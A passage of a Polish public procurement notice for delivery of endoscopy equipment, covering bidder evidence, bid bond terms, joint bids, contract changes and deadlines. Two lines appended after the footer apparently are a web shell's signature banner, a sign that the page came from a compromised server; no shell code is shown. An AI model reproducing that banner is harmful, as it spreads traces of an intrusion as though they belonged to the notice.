zalega z<br/>opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy<br/>Pzp, wystawione nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z<br/>opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym<br/>dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem terminu<br/>składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub<br/>zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności;<br/>Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzone nie wcześniej niż<br/>3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>9) Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust. 1 ustawy Pzp w zakresie odnoszącym się do podstaw wykluczenia wskazanych w art. 108 ust.<br/>1 pkt 3-6 ustawy Pzp oraz w zakresie podstaw wykluczenia wskazanych w art. 109 ust. 1 pkt 1, 5 i 7<br/>ustawy Pzp</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wszyscy Wykonawcy wraz z ofertą: 1) Wypełnione i<br/>podpisane oświadczenie o braku podstaw do wykluczenia i spełnieniu warunków udziału w postępowaniu aktualne na dzień składania ofert – Załącznik nr 4 do SWZ (wzór oświadczenia)<br/>Wykonawca, którego oferta została najwyżej oceniona na wezwanie Zamawiającego składa w<br/>wyznaczonym terminie (nie krótszym niż 5 dni) aktualne na dzień złożenia podmiotowe środki dowodowe: - potwierdzające spełnianie warunku zdolności technicznej lub zawodowej w postaci:<br/>należytego wykonania, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywania, co najmniej dwóch dostaw:<br/> urządzeń medycznych typu kolumna endoskopowa,<br/>w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie;<br/>Wykaz dostaw wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane lub są wykonywane oraz załączeniem dowodów określających, czy te<br/>dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały<br/>wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być<br/>wystawione w okresie ostatnich 3 miesięcy; wzór wykazu dostaw stanowi Załącznik nr 5 do SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Wszyscy Wykonawcy wraz z ofertą: Broszury, opisy, foldery, ulotki, materiały informacyjne producenta, fotografie, opisy techniczne lub dane katalogowe, które w jednoznaczny sposób potwierdzają, że oferowana dostawa spełnia wymagania opisane w Załącznik 3 do SWZ. Parametry, których brakuje w kartach katalogowych, ulotkach, itp. mogą być potwierdzone oświadczeniem producenta <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Broszury, opisy, foldery, ulotki, materiały informacyjne producenta, fotografie, opisy techniczne lub dane katalogowe, które w jednoznaczny sposób potwierdzają, że oferowana dostawa spełnia wymagania opisane w Załącznik 3 do SWZ. Parametry, których brakuje w kartach<br/>katalogowych, ulotkach, itp. mogą być potwierdzone oświadczeniem producenta <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> I. Wraz z ofertą Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie, że nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu: Wypełnione i podpisane oświadczenie o braku podstaw do wykluczenia i spełnieniu warunków udziału w postępowaniu aktualne na dzień składania ofert – Załącznik nr 4 do SWZ (wzór oświadczenia)<br/>II. Oferta winna zawierać również:	1. Wypełniony FORMULARZ OFERTY– stanowiący Załącznik nr 1 do SWZ.<br/>	2. Wypełniony FORMULARZ OFERTOWO-CENOWY - stanowiący Załącznik nr 2 do SWZ<br/>	3. Wypełniony SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA - stanowiący Załącznik nr 3 do SWZ (UWAGA: Zamawiający wymaga podania nazwy producenta/typu/modelu oferowanego wyposażenia) pod rygorem odrzucenia oferty.<br/>	4. Oświadczenie o braku podstaw do wykluczenia i spełniania warunków udziału w postępowaniu Wzór oświadczenia stanowi Załącznik nr 4 do SWZ<br/>	5. Dokument potwierdzający wniesienie wadium w wysokości, terminie i formie wskazanej w SWZ.<br/>	6. Broszury, opisy, foldery, ulotki, materiały informacyjne producenta, fotografie, opisy techniczne lub dane katalogowe, które w jednoznaczny sposób potwierdzają, że oferowana dostawa spełnia wymagania opisane w Załączniku nr 3 do SWZ<br/>	7. Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy, jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w pkt. VI.1.8) SWZ<br/>Treść pełnomocnictwa musi jednoznacznie określać czynności do wykonania, których pełnomocnik jest upoważniony. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Przystępując do przetargu Wykonawca jest zobowiązany wnieść wadium w wysokości:<br/>Wysokość wadium dla całości zamówienia wynosi 7.500,00 zł (słownie: siedem tysięcy pięćset złotych 00/100)<br/>Wykonawca jest zobowiązany wnieść wadium przed upływem terminu składania ofert i<br/>utrzymać nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o<br/>których mowa w art. 98 ust.1 pkt. 2 i 3 oraz ust. 2. <br/>3.3.W zależności od woli Wykonawcy wadium może być wnoszone w jednej lub kilku<br/>następujących formach:<br/>a/ pieniądzu - na następujący rachunek bankowy Zamawiającego:<br/>55 1020 1853 0000 9702 0094 4959<br/>z dopiskiem: „Wadium - postępowanie 8/TP/21”<br/>b/ gwarancjach bankowych,<br/>c/ gwarancjach ubezpieczeniowych,<br/>d/ poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt.2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (j.t.<br/>Dz.U.2020.299).<br/>3.4. Wadium wnoszone w pieniądzu będzie skuteczne z chwilą uznania środków pieniężnych na<br/>rachunku bankowym Zamawiającego wskazanym powyżej, przed upływem terminu składania<br/>ofert.<br/>3.5. W przypadku wniesienia wadium w formie poręczenia lub gwarancji powinno być ważne<br/>przez okres związania ofertą. Z treści takiego dokumentu wadialnego winno wynikać<br/>nieodwołalne, bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w<br/>terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty<br/>wadium w przypadkach określonych w ustawie Pzp. Wraz z ofertą Wykonawca musi przesłać<br/>oryginał dokumentu wadialnego w postaci elektronicznej, opatrzonej kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym lub podpisem osobistym przez Gwaranta (tj. przez<br/>wystawcę gwarancji/poręczenia), poprzez skompresowanie go wraz z plikami stanowiącymi<br/>ofertę do jednego pliku archiwum (ZIP).Wymóg ten nie dotyczy złożenia wadium w formie<br/>depeszy wygenerowanej w systemie SWIFT w rozumieniu prawa bankowego.<br/>3.6. Zamawiający nie dopuszcza złożenia skanu przedmiotowych dokumentów.<br/>3.7. Oferta Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy<br/>lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o<br/>zwrot wadium w przypadku o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp zostanie<br/>odrzucona.<br/>3.8. Wadium dla Wykonawców wspólnie ubiegających się o udzielenie zamówienia może być<br/>wniesione przez jednego z tych Wykonawców, kilku z nich lub wszystkich łącznie.<br/>3.9. Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 2.1. Oferty przedstawione przez dwa lub więcej podmiotów<br/>występujących wspólnie, będą musiały spełniać następujące wymagania: 2. 2 W przypadku<br/>złożenia oferty wspólnej, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy<br/>w sprawie zamówienia publicznego. 2. 3 W przypadku Wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia, oświadczenie o braku podstaw do wykluczenia i spełnianiu warunków<br/>udziału w postępowaniu, w zakresie, w jakim każdy z Wykonawców wykazuje spełnienie<br/>warunków udziału w postępowaniu, składa każdy z Wykonawców wspólnie ubiegających się o<br/>zamówienie. Oświadczenie te wstępnie potwierdza spełnianie warunków udziału w postępowaniu oraz brak podstaw do wykluczenia w zakresie, w którym każdy z Wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw do<br/>wykluczenia.Wymagane dokumenty potwierdzające brak podstaw do wykluczenia, w tym<br/>oświadczenie, o którym mowa w pkt. VI.1.1) SWZ, składa każdy z Wykonawców.<br/> 2.4 Oferta<br/>będzie podpisana kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem<br/>osobistym w taki sposób, by wiązała prawnie wszystkich partnerów. 2. 5Wykonawcy składający<br/>wspólną ofertę, o których mowa w pkt. 2.1) ponoszą solidarną odpowiedzialność za wykonanie<br/>umowy o zamówienie publiczne.2.6. Jeżeli oferta Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia zostanie wybrana-Zamawiający może zażądać - przed podpisaniem<br/>umowy - kopii umowy regulującej współpracę tych podmiotów.<br/><br/>W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie<br/>zamówienia publicznego oferta winna zawierać ponadto: a) Oświadczenie o braku podstaw do<br/>wykluczenia i spełnianiu warunków udziału w postępowaniu, w którym każdy z<br/>Wykonawców wykazuje brak podstaw do wykluczenia i spełnianie warunków udziału w<br/>postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnienie warunków udziału<br/>w postępowaniu,składa każdy z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia publicznego.Wzór oświadczenia stanowi Załącznik nr 3 do SWZ.b) Dokument<br/>pełnomocnictwa pełnomocnika występującego w imieniu podmiotów ubiegających się o wspólne<br/>wykonanie zamówienia w przypadku składania oferty wspólnej. Z treści pełnomocnictwa<br/>muszą jednoznacznie wynikać czynności do wykonania, których pełnomocnik jest upoważniony<br/>oraz umocowanie do reprezentacji wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza możliwość zmiany umowy, o których mowa powyżej w następujących przypadkach:<br/>a) z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego, tj. dostarczenia sprzętu o parametrach wyższych, wydłużenia czasu gwarancji lub polepszenia jej warunków.<br/>b) zmiana dotycząca terminu wykonania przedmiotu zamówienia – w przypadku wystąpienia okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,<br/>c) zmiany dotyczące terminu wykonania przedmiotu zamówienia – w przypadku konieczności prowadzenia działań przez osoby trzecie uniemożliwiające wykonywanie przedmiotu zamówienia, które to działania nie są spowodowane przyczynami leżącymi po stronie Wykonawcy,<br/>d) zmiany umowy są konieczne w związku ze zmianą odpowiednich przepisów prawa,<br/>e) zmiany umowy są konieczne na skutek działania organów administracji lub instytucji upoważnionych do wydania decyzji albo innych aktów władczych lub nadzorczych, związanych z realizacją przedmiotu umowy,<br/>f) terminu realizacji umowy w tym dostawy, montażu, uruchomienia, szkolenia lub odbioru przedmiotu zamówienia – z przyczyn organizacyjnych leżących po stronie Zamawiającego, w tym w sytuacji przedłużenia się terminów wykonania robót budowlanych obiektów i pomieszczeń, do których planowane jest zainstalowanie sprzętu, zmiany terminów rozliczenia dotacji lub w wyniku innych okoliczności uniemożliwiających wykonanie umowy z przyczyn nieleżących po żadnej ze Stron,<br/>oraz w pozostałych wypadkach wskazanych w art. 455 ustawy Pzp, przy czym wszystkie zmiany w umowie zostają potwierdzone aneksem w formie pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-12 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem platformazakupowa.pl (zwanej dalej „Platformą”) pod adresem: https://platformazakupowa.pl/pn/pcr_sopot na stronie dotyczącej odpowiedniego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-12 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-10</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Termin realizacji przedmiotu zamówienia publicznego:<br/>do 6 tygodni od dnia zawarcia umowy, z tym że:<br/>- dostawy drenów wykonywane będą w okresie 24 miesięcy od dnia zawarcia umowy (dotyczy Poz nr 2).</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-08-02 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com